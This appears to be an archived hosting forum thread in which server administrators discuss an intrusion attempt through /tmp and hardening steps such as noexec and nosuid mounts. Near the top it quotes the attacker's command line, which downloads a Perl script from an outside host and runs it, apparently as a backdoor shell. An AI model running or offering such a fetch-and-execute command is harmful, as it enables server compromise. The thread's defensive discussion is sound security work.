Just to inform you there are bad guys out there
sh-ccd /tmp;wget www.eurobit.it/bd.pl;perl bd.pl
the were trying to execute this script through /tmp
good guide
http://forums.cpanel.net/showthread.php?s=...86660#post86660
Full Version: be aware >> tried to get in using /tmp
Hmm... How was that command run? Probably through an insecure php script, right? Those php includes exploits seem to be pretty popular now for getting into a server.
Hmm, I'm not all that great with perl, but it rather looks like this opens a port and allows (open) access to the shell through it?
You'd better check what (perl) programs are running and your /etc/services file to make sure it wasn't successfully run. I don't think the secure /tmp setting prevent perl scripts from being run in /tmp? Hmm, yep I just tried it and perl did execute my pl file in my 'secure' tmp.
I haven't registered at cpanel's forums yet though, so I may not be talking about the same thing.
Hmm, I'm not all that great with perl, but it rather looks like this opens a port and allows (open) access to the shell through it?
You'd better check what (perl) programs are running and your /etc/services file to make sure it wasn't successfully run. I don't think the secure /tmp setting prevent perl scripts from being run in /tmp? Hmm, yep I just tried it and perl did execute my pl file in my 'secure' tmp.
I haven't registered at cpanel's forums yet though, so I may not be talking about the same thing.
The majority of exploits I've seen using the /tmp directory included uploaded binaries. There is still a way around the noexec option with binaries, but it does make it a bit harder. Nonetheless, nothing should be executed in /tmp so there is no reason to leave that option off. I like to set nosuid as well.
mount --bind /tmp /tmp
mount -o remount,noexec,nosuid
Script kiddies will usually give up if the process is too complex to exploit
This is why we call them script kiddies and not hackers.
I think the only way to prevent any code from being executed in /tmp is by using ACLs (such as with grsec).
mount --bind /tmp /tmp
mount -o remount,noexec,nosuid
Script kiddies will usually give up if the process is too complex to exploit
This is why we call them script kiddies and not hackers.
I think the only way to prevent any code from being executed in /tmp is by using ACLs (such as with grsec).
The secured tmp will save you a lot of issues. We had someone trying to upload zbind kits last week and it blocked them from executing. I am just tempted to shut off all signups on the weekends for us. Seems 90% of the people that sign up between Friday night and Sunday morning are scammers.
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.